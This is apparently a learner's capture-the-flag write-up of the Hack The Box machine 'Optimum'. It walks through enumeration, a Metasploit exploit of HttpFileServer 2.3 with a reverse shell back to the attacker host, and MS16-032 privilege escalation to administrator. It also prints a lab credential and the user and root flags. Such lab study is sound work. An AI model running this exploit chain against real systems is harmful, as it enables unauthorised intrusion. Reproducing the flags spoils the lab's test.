# Optimum ## TARGET IP: 10.10.10.8 ## HOST IP: 10.10.16.10 ## Recon ### NMAP ``` nmap [Target IP] ```

``` nmap [Target IP] -A -p 80 ```

### HTTP

* Nothing on page source that I could find. * It is using [HttpFileServer 2.3](https://sgtdiddlywink.gitbook.io/htb/machines/easy-machines/stocker) * Their latest version is 2.3m

* The login button opens up prompt for login.

* Let's take a crack at logging in with credentails `admin:admin`.

* Discovered new directory `/~login`. This uses a tildy infront. ![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FfdOABwk62jtC8brTbM2Q%2Fimage.png?alt=media\&token=936c9dd3-345e-47af-86ca-701f4e88a47f) ### Vulnerable Software * HFS 2.3 is old and filled with goodies. * Lots of vulnerabilities are mentioned on their own website: ![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FXMm3QRu9w3RZwlPlPqHN%2Fimage.png?alt=media\&token=34dc196d-e29d-4837-9e72-81356d66e1d6) * Exploit DB has two verified exploits [1](https://www.exploit-db.com/exploits/34668) & [2](https://www.exploit-db.com/exploits/39161). * ## Enumeration ### Gobuster ``` gobuster dir -u http://[Target IP] -w /usr/share/dirb/wordlists/common.txt ```

* Try putting a \~ at the end since we saw that the `/~login` directory had it. ``` gobuster dir -u http://[Target IP]/~ -w /usr/share/dirb/wordlists/common.txt ``` ### WinPEASx64 * Credentials for kostas ![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FXlr9lDCVZVTSJF6UunnM%2Fimage.png?alt=media\&token=74d77e08-c01b-4c68-85eb-4bcaa129b077) ``` kdeEjDowkS* ``` * I need to be better at looking through these to see if I could've found more information. ### Browsing * Run the typical commands from the [hacktricks checklist](https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation) to see some information on the system. ``` sysinfo ``` * This will tell us the system is Windows 12 Server R2. * This is a 64-bit system. ## Exploit ### Metasploit * Let's check out Metasploit ``` msfconsole search hfs ``` ![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2Fd3mG9UlpXB1t6IBFaIRw%2Fimage.png?alt=media\&token=2731e1a7-c5d0-4262-b675-3969709dbd89) ``` use 1 show options ``` ![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2Fp3QSKNh0yJUkMplYybKQ%2Fimage.png?alt=media\&token=ffba0412-b816-449b-8c1c-abbb095e42d2) ``` set rhosts [Target IP] set lhost [Host IP] check exploit ``` ![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FfZcP6MCvfmhUuHHLgD4D%2Fimage.png?alt=media\&token=2b0bdd56-f44d-4b14-9c01-d12aad2876d7) * Now we have a Meterpreter session. ``` shell whoami ``` ![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FjlJVNx2QNft0AZGHoiMz%2Fimage.png?alt=media\&token=87a5a99b-d160-4ca0-a159-c84002d1f373) ``` type C:\Users\kostas\Desktop\user.txt ``` * User Flag ``` b9058357319a5b76f10e01253a382c67 ``` * Next step is to use Metasploit to gain root privileges. I tried browsing the system for a while but didn't find anything useful. The tool I need is a kernel exploit. * When we ran the `sysinfo` command we found the system is a Windows 2012 R2 server which is a 64-bit architecture. The `reverse_tcp_shell` that we are using as our payload is a 32-bit process. We should `migrate` over to a different process that is 64-bit. * On the meterpreter shell run the following. ``` ps ``` ![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FKoVTnNkzgPfIlVDKGLCD%2Fimage.png?alt=media\&token=d747782e-1a63-4eb3-bb24-9e1acae56e50) * We see that the `explorer.exe` process is running on `PID 660`. * Let's `migrate` over to this process. ``` migrate [PID for explorer.exe] ``` ![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FQOReqaNOMwhy2MXFS4ih%2Fimage.png?alt=media\&token=f5470c78-16f7-46ba-be22-5194a7f69e80) ![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FXi4QNkh3p7IOlZG5B9Yy%2Fimage.png?alt=media\&token=d83d62c2-8005-4b1e-acb3-49d17e58d7c9) * Next, let's `background` the current meterpreter system we have in the system. ``` bg ``` ![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FbWj9mWC5U6cPoNLSL1Pj%2Fimage.png?alt=media\&token=2b666ebe-ab08-41ba-bf33-b54684e89ad8) * We can confirm this has been backgrounded: ``` sessions ``` ![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2F5uftvySaLOC6y8bYyuQG%2Fimage.png?alt=media\&token=375d5969-2378-4fab-86f2-f73f157cb69f) * Since we now have access to the windows system, let's see if we can find another metasploit local exploit to root privileges. ``` search exploit/windows/local ``` ![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FejTm0kMd2xMXJHsLnulr%2Fimage.png?alt=media\&token=c6c110a4-6a19-49ee-b362-ad17302c0b4c) * I had to get a hint here and use a Microsoft vulnerability in the system [MS16\_032](https://learn.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-032). ``` use 33 ``` ![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2F1ykn27F8cqXf3D18AC6S%2Fimage.png?alt=media\&token=e601baac-a043-44e7-86f2-99a1cf47c7ba) * I'm not sure if winPEASx64 showed this somewhere but I could have also used a tool called [window-exploit-suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester). Here is a [write-up](https://alamot.github.io/optimum_writeup/) on how to use it. It's a bit complicated as you run it on your host system by exporting the target system info. * After selecting our exploit in Metasploit we will then set it up and run it. ``` show options set session 1 set lhost [Host IP] ``` ![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FJJfhxuvjpB8ElGy3PEMg%2Fimage.png?alt=media\&token=a1b4150a-a58c-4943-aa1f-b1589e28383b) ``` exploit ``` ![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2Fg3IMHrozRpiFiPNzAsGE%2Fimage.png?alt=media\&token=33f54e94-86de-43b8-99b3-23730ba15369) * We now have a shell to the system as administrator. ``` shell type C:\Users\Administrator\Desktop\root.txt ``` ![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2F8dnHF6k8IFngct0T7Em2%2Fimage.png?alt=media\&token=86ed3bd8-502a-4de6-b827-e36d2b427c92) ``` 64869e78042316656ffc989ba52d5d2b ``` ## Conclusion * I knew going into this lab that I could use Metasploit. I didn't know when I would get to use it but knew it was an option. I wanted to try to get access to the system without Metasploit but I don't think my level of skill is high enough to do it, let alone understand it. * I need to work on my enumeration skills with Windows systems. I have a far better understanding of them with Linux and could probably spend some more time with Windows. * It was a good lab but I'd really like to finish one of these without help one day.